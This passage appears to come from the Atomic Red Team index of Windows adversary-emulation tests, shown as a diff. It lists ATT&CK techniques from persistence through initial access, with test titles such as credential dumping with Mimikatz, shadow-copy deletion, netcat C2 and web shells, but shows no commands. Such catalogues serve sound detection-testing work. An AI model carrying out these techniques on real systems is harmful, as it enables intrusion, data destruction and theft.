- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1505.002 Transport Agent](../../T1505.002/T1505.002.md)
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1505.003 Web Shell](../../T1505.003/T1505.003.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription [windows]
- [T1543.003 Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
# impact
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- Atomic Test #3: Remove Account From Domain Admin Group [windows]
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #5: PureLocker Ransom Note [windows]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1490 Inhibit System Recovery](../../T1490/T1490.md)
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
- Atomic Test #3: Windows - wbadmin Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
- [T1491.001 Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1489 Service Stop](../../T1489/T1489.md)
- Atomic Test #1: Windows - Stop service using Service Controller [windows]
- Atomic Test #2: Windows - Stop service using net.exe [windows]
- Atomic Test #3: Windows - Stop service by killing process [windows]
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
- Atomic Test #2: Restart System - Windows [windows]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# discovery
- T1087 Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1010 Application Window Discovery](../../T1010/T1010.md)
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #4: List Google Chrome Bookmarks on Windows with powershell [windows]
- Atomic Test #5: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt [windows]
- Atomic Test #6: List Mozilla Firefox bookmarks on Windows with command prompt [windows]
- Atomic Test #7: List Internet Explorer Bookmarks using the command prompt [windows]
- [T1087.002 Domain Account](../../T1087.002/T1087.002.md)
- Atomic Test #1: Enumerate all accounts (Domain) [windows]
- Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows]
- Atomic Test #3: Enumerate logged on users via CMD (Domain) [windows]
- Atomic Test #4: Automated AD Recon (ADRecon) [windows]
- Atomic Test #5: Adfind -Listing password policy [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Admins [windows]
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
- Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
- Atomic Test #3: Elevated group enumeration using net group (Domain) [windows]
- Atomic Test #4: Find machines where user has local admin access (PowerView) [windows]
- Atomic Test #5: Find local admins on all machines in domain (PowerView) [windows]
- Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
- Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
- Atomic Test #8: Adfind - Query Active Directory Groups [windows]
- [T1482 Domain Trust Discovery](../../T1482/T1482.md)
- Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
- Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
- Atomic Test #3: Powershell enumerate domains and forests [windows]
- Atomic Test #4: Adfind - Enumerate Active Directory OUs [windows]
- Atomic Test #5: Adfind - Enumerate Active Directory Trusts [windows]
- T1087.003 Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
- Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1087.001 Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
- Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
- Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
- Atomic Test #11: Enumerate logged on users via PowerShell [windows]
- [T1069.001 Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows]
- Atomic Test #3: Permission Groups Discovery PowerShell (Local) [windows]
- [T1046 Network Service Scanning](../../T1046/T1046.md)
- Atomic Test #3: Port Scan NMap for Windows [windows]
- Atomic Test #4: Port Scan using python [windows]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #3: Network Share Discovery command prompt [windows]
- Atomic Test #4: Network Share Discovery PowerShell [windows]
- Atomic Test #5: View available share drives [windows]
- Atomic Test #6: Share Discovery with PowerView [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #5: Examine local password policy - Windows [windows]
- Atomic Test #6: Examine domain password policy - Windows [windows]
- [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
- Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #2: Process Discovery - tasklist [windows]
- [T1012 Query Registry](../../T1012/T1012.md)
- Atomic Test #1: Query Registry [windows]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #1: Remote System Discovery - net [windows]
- Atomic Test #2: Remote System Discovery - net group Domain Computers [windows]
- Atomic Test #3: Remote System Discovery - nltest [windows]
- Atomic Test #4: Remote System Discovery - ping sweep [windows]
- Atomic Test #5: Remote System Discovery - arp [windows]
- Atomic Test #8: Remote System Discovery - nslookup [windows]
- Atomic Test #9: Remote System Discovery - adidnsdump [windows]
- Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
- Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
- [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
- Atomic Test #5: Security Software Discovery - Sysmon Service [windows]
- Atomic Test #6: Security Software Discovery - AV Discovery via WMI [windows]
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #6: Hostname Discovery (Windows) [windows]
- Atomic Test #8: Windows MachineGUID Discovery [windows]
- Atomic Test #9: Griffon Recon [windows]
- Atomic Test #10: Environment variables discovery on windows [windows]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #1: System Network Configuration Discovery on Windows [windows]
- Atomic Test #2: List Windows Firewall Rules [windows]
- Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows]
- Atomic Test #5: List Open Egress Ports [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows]
- Atomic Test #7: Qakbot Recon [windows]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #1: System Network Connections Discovery [windows]
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
- Atomic Test #4: System Discovery using SharpView [windows]
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #1: System Owner/User Discovery [windows]
- Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #1: System Service Discovery [windows]
- Atomic Test #2: System Service Discovery - net.exe [windows]
- [T1124 System Time Discovery](../../T1124/T1124.md)
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# command-and-control
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.004 DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
- Atomic Test #2: DNS Regular Beaconing [windows]
- Atomic Test #3: DNS Long Domain Query [windows]
- Atomic Test #4: DNS C2 [windows]
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1573 Encrypted Channel](../../T1573/T1573.md)
- Atomic Test #1: OpenSSL C2 [windows]
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]
- Atomic Test #10: Windows - PowerShell Download [windows]
- Atomic Test #11: OSTAP Worming Activity [windows]
- Atomic Test #12: svchost writing a file to a UNC path [windows]
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #3: portproxy reg key [windows]
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.003 Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1095 Non-Application Layer Protocol](../../T1095/T1095.md)
- Atomic Test #1: ICMP C2 [windows]
- Atomic Test #2: Netcat C2 [windows]
- Atomic Test #3: Powercat C2 [windows]
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1219 Remote Access Software](../../T1219/T1219.md)
- Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
- Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
- Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
- [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #2: XOR Encoded data. [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.001 Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# execution
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1559.002 Dynamic Data Exchange](../../T1559.002/T1559.002.md)
- Atomic Test #1: Execute Commands [windows]
- Atomic Test #2: Execute PowerShell script via Word DDE [windows]
- Atomic Test #3: DDEAUTO [windows]
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.007 JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1204.002 Malicious File](../../T1204.002/T1204.002.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
- Atomic Test #6: Excel 4 Macro [windows]
- Atomic Test #7: Headless Chrome code execution via VBA [windows]
- Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
- [T1059.001 PowerShell](../../T1059.001/T1059.001.md)
- Atomic Test #1: Mimikatz [windows]
- Atomic Test #2: Run BloodHound from local disk [windows]
- Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows]
- Atomic Test #4: Obfuscation Tests [windows]
- Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #6: Invoke-AppPathBypass [windows]
- Atomic Test #7: Powershell MsXml COM object - with prompt [windows]
- Atomic Test #8: Powershell XML requests [windows]
- Atomic Test #9: Powershell invoke mshta.exe download [windows]
- Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #11: PowerShell Fileless Script Execution [windows]
- Atomic Test #12: PowerShell Downgrade Attack [windows]
- Atomic Test #13: NTFS Alternate Data Stream Access [windows]
- Atomic Test #14: PowerShell Session Creation and Use [windows]
- Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
- Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
- Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
- Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
- T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1569.002 Service Execution](../../T1569.002/T1569.002.md)
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
- Atomic Test #3: Extract Memory via VBA [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- Atomic Test #2: Writes text to a file and displays it. [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
- Atomic Test #3: WMI Reconnaissance Software [windows]
- Atomic Test #4: WMI Reconnaissance List Remote Services [windows]
- Atomic Test #5: WMI Execute Local Process [windows]
- Atomic Test #6: WMI Execute Remote Process [windows]
- Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows]
- Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
# exfiltration
- [T1020 Automated Exfiltration](../../T1020/T1020.md)
- Atomic Test #1: IcedID Botnet HTTP PUT [windows]
- T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1048 Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# lateral-movement
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md)
- Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- [T1550.003 Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- [T1563.002 RDP Hijacking](../../T1563.002/T1563.002.md)
- Atomic Test #1: RDP hijacking [windows]
- [T1021.001 Remote Desktop Protocol](../../T1021.001/T1021.001.md)
- Atomic Test #1: RDP to DomainController [windows]
- Atomic Test #2: RDP to Server [windows]
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1021.002 SMB/Windows Admin Shares](../../T1021.002/T1021.002.md)
- Atomic Test #1: Map admin share [windows]
- Atomic Test #2: Map Admin Share PowerShell [windows]
- Atomic Test #3: Copy and Execute File with PsExec [windows]
- Atomic Test #4: Execute command writing output to local Admin Share [windows]
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1021.006 Windows Remote Management](../../T1021.006/T1021.006.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: Invoke-Command [windows]
- Atomic Test #3: WinRM Access with Evil-WinRM [windows]
# initial-access
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin priviliges [windows]
- T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1566.001 Spearphishing Attachment](../../T1566.001/T1566.001.md)
- Atomic Test #1: Download Phishing Attachment - VBScript [windows]
- Atomic Test #2: Word spawned a command shell and used an IP address in the command line [windows]
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
atomics/Indexes/Matrices/linux-matrix.md
-90
View File
@@ -1,90 +0,0 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
